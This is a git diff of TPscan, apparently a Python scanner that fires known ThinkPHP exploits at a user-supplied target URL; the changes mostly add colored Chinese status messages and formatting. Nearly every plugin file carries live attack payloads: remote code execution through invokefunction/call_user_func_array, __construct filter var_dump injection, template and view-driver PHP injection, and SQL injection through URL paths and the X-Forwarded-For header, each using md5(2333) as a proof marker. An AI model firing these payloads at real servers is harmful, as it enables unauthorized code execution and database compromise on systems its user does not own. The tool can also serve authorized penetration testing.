diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..fcc02f4 --- /dev/null +++ b/.gitignore @@ -0,0 +1,2 @@ +.idea +*__pycache__ \ No newline at end of file diff --git a/README.md b/README.md index 5d98ee0..817fd78 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,4 @@ # TPscan 一键ThinkPHP漏洞检测,基于Python3 + +![](https://raw.githubusercontent.com/pfinal-nc/iGallery/master/blog/202311011758502.png) \ No newline at end of file diff --git a/TPscan.py b/TPscan.py index 8bee688..30f214f 100644 --- a/TPscan.py +++ b/TPscan.py @@ -1,7 +1,10 @@ #!/usr/bin/env python # coding=utf-8 -from gevent import monkey;monkey.patch_all() +from gevent import monkey; + +monkey.patch_all() from gevent.pool import Pool +from termcolor import colored from plugins.thinkphp_checkcode_time_sqli import thinkphp_checkcode_time_sqli_verify from plugins.thinkphp_construct_code_exec import thinkphp_construct_code_exec_verify from plugins.thinkphp_construct_debug_rce import thinkphp_construct_debug_rce_verify @@ -19,6 +22,7 @@ import sys import gevent + print(''' ___________ |_ _| ___ \ @@ -29,7 +33,8 @@ code by Lucifer ''') targeturl = input("[*]Give me a target: ") -if targeturl.find('http') == -1: +if targeturl.find('http') == -1 and targeturl.find('https') == -1: + print(colored("\n[*]Please input a valid url!", "red")) exit(1) poclist = [ 'thinkphp_checkcode_time_sqli_verify("{0}")'.format(targeturl), @@ -48,10 +53,12 @@ 'thinkphp_view_recent_xff_sqli_verify("{0}")'.format(targeturl), ] + def pocexec(pocstr): exec(pocstr) gevent.sleep(0) + pool = Pool(10) threads = [pool.spawn(pocexec, item) for item in poclist] -gevent.joinall(threads) \ No newline at end of file +gevent.joinall(threads) diff --git a/img.png b/img.png new file mode 100644 index 0000000..e69de29 diff --git a/plugins/thinkphp_checkcode_time_sqli.py b/plugins/thinkphp_checkcode_time_sqli.py index 8c243eb..65b7cc5 100644 --- a/plugins/thinkphp_checkcode_time_sqli.py +++ b/plugins/thinkphp_checkcode_time_sqli.py @@ -2,22 +2,28 @@ # coding=utf-8 import time import urllib + import requests import urllib3 +from termcolor import colored + urllib3.disable_warnings() + def thinkphp_checkcode_time_sqli_verify(url): + """thinkphp_checkcode_time_sqli_verify""" + pocdict = { - "vulnname":"thinkphp_checkcode_time_sqli", + "vulnname": "thinkphp_checkcode_time_sqli", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : "TPscan", + "User-Agent": "TPscan", "DNT": "1", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Content-Type": "multipart/form-data; boundary=--------641902708", @@ -34,8 +40,11 @@ def thinkphp_checkcode_time_sqli_verify(url): pocdict['vulnurl'] = vurl pocdict['payload'] = payload pocdict['proof'] = 'time sleep 15' - pocdict['response'] = req.text - print(pocdict) - - except: + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_checkcode_time_sqli 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_checkcode_time_sqli 漏洞", "red")) + except Exception as e: + print(colored("\n[*] 目标不存在 thinkphp_checkcode_time_sqli 漏洞", "red")) pass diff --git a/plugins/thinkphp_construct_code_exec.py b/plugins/thinkphp_construct_code_exec.py index 31d2e02..2bb5c19 100644 --- a/plugins/thinkphp_construct_code_exec.py +++ b/plugins/thinkphp_construct_code_exec.py @@ -3,26 +3,30 @@ import urllib import requests import urllib3 +from termcolor import colored + urllib3.disable_warnings() + def thinkphp_construct_code_exec_verify(url): + """thinkphp_construct_code_exec_verify""" pocdict = { - "vulnname":"thinkphp_construct_code_exec", + "vulnname": "thinkphp_construct_code_exec", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : "TPscan", + "User-Agent": "TPscan", } payload = { - '_method':'__construct', - 'filter[]':'var_dump', - 'method':'get', - 'server[REQUEST_METHOD]':'f7e0b956540676a129760a3eae309294', + '_method': '__construct', + 'filter[]': 'var_dump', + 'method': 'get', + 'server[REQUEST_METHOD]': 'f7e0b956540676a129760a3eae309294', } try: vurl = urllib.parse.urljoin(url, 'index.php?s=captcha') @@ -32,8 +36,10 @@ def thinkphp_construct_code_exec_verify(url): pocdict['vulnurl'] = vurl pocdict['payload'] = payload pocdict['proof'] = '56540676a129760a3ea' - pocdict['response'] = req.text - print(pocdict) - + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_construct_code_exec 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_construct_code_exec 漏洞", "red")) except: pass diff --git a/plugins/thinkphp_construct_debug_rce.py b/plugins/thinkphp_construct_debug_rce.py index 28c5be5..0cb4488 100644 --- a/plugins/thinkphp_construct_debug_rce.py +++ b/plugins/thinkphp_construct_debug_rce.py @@ -3,25 +3,29 @@ import urllib import requests import urllib3 + urllib3.disable_warnings() +from termcolor import colored + def thinkphp_construct_debug_rce_verify(url): + """thinkphp_construct_debug_rce_verify""" pocdict = { - "vulnname":"thinkphp_construct_debug_rce", + "vulnname": "thinkphp_construct_debug_rce", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : "TPscan", + "User-Agent": "TPscan", } payload = { - '_method':'__construct', - 'filter[]':'var_dump', - 'server[REQUEST_METHOD]':'f7e0b956540676a129760a3eae309294', + '_method': '__construct', + 'filter[]': 'var_dump', + 'server[REQUEST_METHOD]': 'f7e0b956540676a129760a3eae309294', } try: vurl = urllib.parse.urljoin(url, 'index.php') @@ -31,8 +35,11 @@ def thinkphp_construct_debug_rce_verify(url): pocdict['vulnurl'] = vurl pocdict['payload'] = payload pocdict['proof'] = '56540676a129760a3' - pocdict['response'] = req.text - print(pocdict) - + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_construct_debug_rce 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_construct_debug_rce 漏洞", "red")) except: + print(colored("\n[*] 目标不存在 thinkphp_construct_debug_rce 漏洞", "red")) pass diff --git a/plugins/thinkphp_debug_index_ids_sqli.py b/plugins/thinkphp_debug_index_ids_sqli.py index f094a3a..4724a76 100644 --- a/plugins/thinkphp_debug_index_ids_sqli.py +++ b/plugins/thinkphp_debug_index_ids_sqli.py @@ -3,20 +3,24 @@ import urllib import requests import urllib3 + urllib3.disable_warnings() +from termcolor import colored + def thinkphp_debug_index_ids_sqli_verify(url): + """thinkphp_debug_index_ids_sqli_verify""" pocdict = { - "vulnname":"thinkphp_debug_index_ids_sqli", + "vulnname": "thinkphp_debug_index_ids_sqli", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : "TPscan", + "User-Agent": "TPscan", } payload = 'index.php?ids[0,UpdAtexml(0,ConcAt(0xa,Md5(2333)),0)]=1' try: @@ -26,8 +30,11 @@ def thinkphp_debug_index_ids_sqli_verify(url): pocdict['isvul'] = True pocdict['vulnurl'] = vurl pocdict['proof'] = '56540676a129760' - pocdict['response'] = req.text - print(pocdict) - + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_debug_index_ids_sqli 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_debug_index_ids_sqli 漏洞", "red")) except: + print(colored("\n[*] 目标不存在 thinkphp_debug_index_ids_sqli 漏洞", "red")) pass diff --git a/plugins/thinkphp_driver_display_rce.py b/plugins/thinkphp_driver_display_rce.py index 1821061..79f0c5f 100644 --- a/plugins/thinkphp_driver_display_rce.py +++ b/plugins/thinkphp_driver_display_rce.py @@ -3,20 +3,24 @@ import urllib import requests import urllib3 + urllib3.disable_warnings() +from termcolor import colored + def thinkphp_driver_display_rce_verify(url): + """thinkphp_driver_display_rce_verify""" pocdict = { - "vulnname":"thinkphp_driver_display_rce", + "vulnname": "thinkphp_driver_display_rce", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : 'TPscan', + "User-Agent": 'TPscan', } try: vurl = urllib.parse.urljoin(url, 'index.php?s=index/\\think\\view\driver\Php/display&content=%3C?php%20var_dump(md5(2333));?%3E') @@ -25,8 +29,11 @@ def thinkphp_driver_display_rce_verify(url): pocdict['isvul'] = True pocdict['vulnurl'] = vurl pocdict['proof'] = '56540676a129760a' - pocdict['response'] = req.text - print(pocdict) - + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_driver_display_rce 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_driver_display_rce 漏洞", "red")) except: + print(colored("\n[*] 目标不存在 thinkphp_driver_display_rce 漏洞", "red")) pass diff --git a/plugins/thinkphp_index_construct_rce.py b/plugins/thinkphp_index_construct_rce.py index 3b1a543..1ba3a10 100644 --- a/plugins/thinkphp_index_construct_rce.py +++ b/plugins/thinkphp_index_construct_rce.py @@ -3,17 +3,21 @@ import urllib import requests import urllib3 + urllib3.disable_warnings() +from termcolor import colored + def thinkphp_index_construct_rce_verify(url): + """thinkphp_index_construct_rce_verify""" pocdict = { - "vulnname":"thinkphp_index_construct_rce", + "vulnname": "thinkphp_index_construct_rce", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { "User-Agent": 'TPscan', @@ -28,9 +32,11 @@ def thinkphp_index_construct_rce_verify(url): pocdict['vulnurl'] = vurl pocdict['payload'] = payload pocdict['proof'] = '56540676a129760a3ea' - pocdict['response'] = req.text - print(pocdict) - + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_index_construct_rce 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_index_construct_rce 漏洞", "red")) except: + print(colored("\n[*] 目标不存在 thinkphp_index_construct_rce 漏洞", "red")) pass - diff --git a/plugins/thinkphp_index_showid_rce.py b/plugins/thinkphp_index_showid_rce.py index 97a5933..15d75a6 100644 --- a/plugins/thinkphp_index_showid_rce.py +++ b/plugins/thinkphp_index_showid_rce.py @@ -4,20 +4,24 @@ import datetime import requests import urllib3 + urllib3.disable_warnings() +from termcolor import colored + def thinkphp_index_showid_rce_verify(url): + """thinkphp_index_showid_rce_verify""" pocdict = { - "vulnname":"thinkphp_index_showid_rce", + "vulnname": "thinkphp_index_showid_rce", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : 'TPscan', + "User-Agent": 'TPscan', } try: vurl = urllib.parse.urljoin(url, 'index.php?s=my-show-id-\\x5C..\\x5CTpl\\x5C8edy\\x5CHome\\x5Cmy_1{~var_dump(md5(2333))}]') @@ -29,8 +33,10 @@ def thinkphp_index_showid_rce_verify(url): pocdict['isvul'] = True pocdict['vulnurl'] = vurl pocdict['proof'] = '56540676a129760a3 found' - pocdict['response'] = req2.text - print(pocdict) - + pocdict['response'] = req2.status_code + print(colored("[+] 目标存在 thinkphp_index_showid_rce 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_index_showid_rce", "red")) except: pass diff --git a/plugins/thinkphp_invoke_func_code_exec.py b/plugins/thinkphp_invoke_func_code_exec.py index b634f3a..1b64fb4 100644 --- a/plugins/thinkphp_invoke_func_code_exec.py +++ b/plugins/thinkphp_invoke_func_code_exec.py @@ -4,20 +4,24 @@ import urllib import requests import urllib3 +from termcolor import colored + urllib3.disable_warnings() + def thinkphp_invoke_func_code_exec_verify(url): + """thinkphp_invoke_func_code_exec_verify""" pocdict = { - "vulnname":"thinkphp_invoke_func_code_exec", + "vulnname": "thinkphp_invoke_func_code_exec", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : 'TPscan', + "User-Agent": 'TPscan', } controllers = list() req = requests.get(url, headers=headers, timeout=15, verify=False) @@ -27,6 +31,7 @@ def thinkphp_invoke_func_code_exec_verify(url): controllers.append(match.split('/')[1]) controllers.append('index') controllers = list(set(controllers)) + status = 0 for controller in controllers: try: payload = 'index.php?s={0}/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=2333'.format(controller) @@ -36,8 +41,11 @@ def thinkphp_invoke_func_code_exec_verify(url): pocdict['isvul'] = True pocdict['vulnurl'] = vurl pocdict['proof'] = '56540676a129760a3' - pocdict['response'] = req.text - print(pocdict) - + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_invoke_func_code_exec 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + status = 1 except: pass + if status == 0: + print(colored("\n[*] 目标不存在 thinkphp_invoke_func_code_exec 漏洞", "red")) diff --git a/plugins/thinkphp_lite_code_exec.py b/plugins/thinkphp_lite_code_exec.py index 80a3096..6534893 100644 --- a/plugins/thinkphp_lite_code_exec.py +++ b/plugins/thinkphp_lite_code_exec.py @@ -3,20 +3,24 @@ import urllib import requests import urllib3 +from termcolor import colored + urllib3.disable_warnings() + def thinkphp_lite_code_exec_verify(url): + """thinkphp_lite_code_exec_verify""" pocdict = { - "vulnname":"thinkphp_lite_code_exec", + "vulnname": "thinkphp_lite_code_exec", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : 'TPscan', + "User-Agent": 'TPscan', } try: payload = 'index.php/module/action/param1/$%7B@print%28md5%282333%29%29%7D' @@ -26,8 +30,11 @@ def thinkphp_lite_code_exec_verify(url): pocdict['isvul'] = True pocdict['vulnurl'] = vurl pocdict['proof'] = '56540676a129760a3' - pocdict['response'] = req.text - print(pocdict) + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_lite_code_exec 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_lite_code_exec 漏洞", "red")) except: - pass + print(colored("\n[*] 目标不存在 thinkphp_lite_code_exec 漏洞", "red")) diff --git a/plugins/thinkphp_method_filter_code_exec.py b/plugins/thinkphp_method_filter_code_exec.py index c87a47d..783ca90 100644 --- a/plugins/thinkphp_method_filter_code_exec.py +++ b/plugins/thinkphp_method_filter_code_exec.py @@ -3,25 +3,29 @@ import urllib import requests import urllib3 +from termcolor import colored + urllib3.disable_warnings() + def thinkphp_method_filter_code_exec_verify(url): + """ thinkphp_method_filter_code_exec_verify """ pocdict = { - "vulnname":"thinkphp_method_filter_code_exec", + "vulnname": "thinkphp_method_filter_code_exec", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : 'TPscan', + "User-Agent": 'TPscan', } payload = { - 'c':'var_dump', - 'f':'f7e0b956540676a129760a3eae309294', - '_method':'filter', + 'c': 'var_dump', + 'f': 'f7e0b956540676a129760a3eae309294', + '_method': 'filter', } try: vurl = urllib.parse.urljoin(url, 'index.php') @@ -31,8 +35,10 @@ def thinkphp_method_filter_code_exec_verify(url): pocdict['vulnurl'] = vurl pocdict['payload'] = payload pocdict['proof'] = '56540676a129760a3ea' - pocdict['response'] = req.text - print(pocdict) - + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_method_filter_code_exec 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_method_filter_code_exec 漏洞", "red")) except: - pass + print(colored("\n[*] 目标不存在 thinkphp_method_filter_code_exec 漏洞", "red")) diff --git a/plugins/thinkphp_multi_sql_leak.py b/plugins/thinkphp_multi_sql_leak.py index ca6b7b1..1774d4f 100644 --- a/plugins/thinkphp_multi_sql_leak.py +++ b/plugins/thinkphp_multi_sql_leak.py @@ -3,20 +3,24 @@ import urllib import requests import urllib3 + urllib3.disable_warnings() +from termcolor import colored + def thinkphp_multi_sql_leak_verify(url): + """ thinkphp_multi_sql_leak_verify""" pocdict = { - "vulnname":"thinkphp_multi_sql_leak", + "vulnname": "thinkphp_multi_sql_leak", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : 'TPscan', + "User-Agent": 'TPscan', } payloads = [ r'index.php?s=/home/shopcart/getPricetotal/tag/1%27', @@ -29,6 +33,7 @@ def thinkphp_multi_sql_leak_verify(url): r'index.php?s=/home/order/cancel/id/1%27', ] try: + status = 0; for payload in payloads: vurl = urllib.parse.urljoin(url, payload) req = requests.get(vurl, headers=headers, timeout=15, verify=False) @@ -36,9 +41,12 @@ def thinkphp_multi_sql_leak_verify(url): pocdict['isvul'] = True pocdict['vulnurl'] = vurl pocdict['proof'] = 'SQL syntax found' - pocdict['response'] = req.text - print(pocdict) + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_multi_sql_leak 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + status = 1 break - + if status == 0: + print(colored("\n[*] 目标不存在 thinkphp_multi_sql_leak 漏洞", "red")) except: - pass + print(colored("\n[*] 目标不存在 thinkphp_multi_sql_leak 漏洞", "red")) diff --git a/plugins/thinkphp_pay_orderid_sqli.py b/plugins/thinkphp_pay_orderid_sqli.py index c82080c..860833b 100644 --- a/plugins/thinkphp_pay_orderid_sqli.py +++ b/plugins/thinkphp_pay_orderid_sqli.py @@ -3,20 +3,24 @@ import urllib import requests import urllib3 + urllib3.disable_warnings() +from termcolor import colored + def thinkphp_pay_orderid_sqli_verify(url): + """thinkphp_pay_orderid_sqli_verify""" pocdict = { - "vulnname":"thinkphp_pay_orderid_sqli", + "vulnname": "thinkphp_pay_orderid_sqli", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : 'TPscan', + "User-Agent": 'TPscan', } try: vurl = urllib.parse.urljoin(url, 'index.php?s=/home/pay/index/orderid/1%27)UnIoN/**/All/**/SeLeCT/**/Md5(2333)--+') @@ -25,8 +29,10 @@ def thinkphp_pay_orderid_sqli_verify(url): pocdict['isvul'] = True pocdict['vulnurl'] = vurl pocdict['proof'] = '56540676a129760a' - pocdict['response'] = req.text - print(pocdict) - + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_pay_orderid_sqli 漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_pay_orderid_sqli 漏洞", "red")) except: - pass + print(colored("\n[*] 目标不存在 thinkphp_pay_orderid_sqli 漏洞", "red")) diff --git a/plugins/thinkphp_request_input_rce.py b/plugins/thinkphp_request_input_rce.py index a466896..e51abb0 100644 --- a/plugins/thinkphp_request_input_rce.py +++ b/plugins/thinkphp_request_input_rce.py @@ -3,20 +3,24 @@ import urllib import requests import urllib3 + urllib3.disable_warnings() +from termcolor import colored + def thinkphp_request_input_rce_verify(url): + """thinkphp_request_input_rce_verify""" pocdict = { - "vulnname":"thinkphp_request_input_rce", + "vulnname": "thinkphp_request_input_rce", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : 'TPscan', + "User-Agent": 'TPscan', } try: vurl = urllib.parse.urljoin(url, 'index.php?s=index/\\think\Request/input&filter=var_dump&data=f7e0b956540676a129760a3eae309294') @@ -25,8 +29,10 @@ def thinkphp_request_input_rce_verify(url): pocdict['isvul'] = True pocdict['vulnurl'] = vurl pocdict['proof'] = '56540676a129760a3ea' - pocdict['response'] = req.text - print(pocdict) - + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_request_input_rce漏洞\tpayload: ", "green")) + print(colored(pocdict, 'green')) + else: + print(colored("\n[*] 目标不存在 thinkphp_request_input_rce漏洞", "red")) except: - pass + print(colored("\n[*] 目标不存在 thinkphp_request_input_rce漏洞", "red")) diff --git a/plugins/thinkphp_view_recent_xff_sqli.py b/plugins/thinkphp_view_recent_xff_sqli.py index 689474e..ca9d7ef 100644 --- a/plugins/thinkphp_view_recent_xff_sqli.py +++ b/plugins/thinkphp_view_recent_xff_sqli.py @@ -3,21 +3,25 @@ import urllib import requests import urllib3 + urllib3.disable_warnings() +from termcolor import colored + def thinkphp_view_recent_xff_sqli_verify(url): + """ thinkphp_view_recent_xff_sqli_verify """ pocdict = { - "vulnname":"thinkphp_view_recent_xff_sqli", + "vulnname": "thinkphp_view_recent_xff_sqli", "isvul": False, - "vulnurl":"", - "payload":"", - "proof":"", - "response":"", - "exception":"", + "vulnurl": "", + "payload": "", + "proof": "", + "response": "", + "exception": "", } headers = { - "User-Agent" : 'TPscan', - "X-Forwarded-For" : "1')And/**/ExtractValue(1,ConCat(0x5c,(sElEct/**/Md5(2333))))#" + "User-Agent": 'TPscan', + "X-Forwarded-For": "1')And/**/ExtractValue(1,ConCat(0x5c,(sElEct/**/Md5(2333))))#" } try: vurl = urllib.parse.urljoin(url, 'index.php?s=/home/article/view_recent/name/1') @@ -26,8 +30,10 @@ def thinkphp_view_recent_xff_sqli_verify(url): pocdict['isvul'] = True pocdict['vulnurl'] = vurl pocdict['proof'] = '56540676a129760a' - pocdict['response'] = req.text - print(pocdict) - + pocdict['response'] = req.status_code + print(colored("[+] 目标存在 thinkphp_view_recent_xff_sqli\tpayload: ", "green")) + print(colored(pocdict, "green")) + else: + print(colored("\n[*] 目标不存在 thinkphp_view_recent_xff_sqli", "red")) except: - pass \ No newline at end of file + print(colored("\n[*] 目标不存在 thinkphp_view_recent_xff_sqli", "red"))